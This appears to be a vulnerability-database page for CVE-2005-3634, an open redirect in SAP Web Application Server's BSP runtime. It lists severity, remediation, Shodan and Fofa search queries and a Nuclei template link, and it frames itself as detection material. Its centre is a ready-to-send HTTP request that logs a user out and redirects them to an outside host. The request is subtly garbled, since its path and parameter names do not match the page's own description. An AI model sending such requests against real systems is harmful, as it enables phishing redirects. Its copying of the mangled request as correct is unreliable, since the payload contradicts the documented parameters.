🔙 목록으로 돌아가기

CVE-2005-3634: SAP Web Application Server 6.x/7.0 - Open Redirect

TitleSAP Web Application Server 6.x/7.0 - Open Redirect
Authorctflearner
SeverityMedium
ImpactAn attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks.
RemediationApply the latest security patches and updates provided by SAP to fix the open redirect vulnerability.
CVSS Score5
EPSS Score0.01653
CVE IDCVE-2005-3634
CWE IDNVD-CWE-Other
Shodan Queryhtml:"SAP Business Server Pages Team"http.html:"sap business server pages team"
Fofa Querybody="sap business server pages team"
Tags cve cve2005 sap redirect business xss vuln

🔍 Vulnerability Description

frameset.htm in the BSP runtime in SAP Web Application Server (WAS) 6.10 through 7.00 allows remote attackers to log users out and redirect them to arbitrary web sites via a close command in the sap-sessioncmd parameter and a URL in the sap-exiturl parameter.

🌐 HTTP Request

GET /sap/bc/BSp/sap/menu/fameset.htm?sap--essioncmd=close&sapexiturl=https%3a%2f%2finteract.sh HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.7.20) Gecko/ Firefox/4.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2005/CVE-2005-3634.yaml

🦈 Packet Capture: ⬇️ Download cve-2005-3634.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A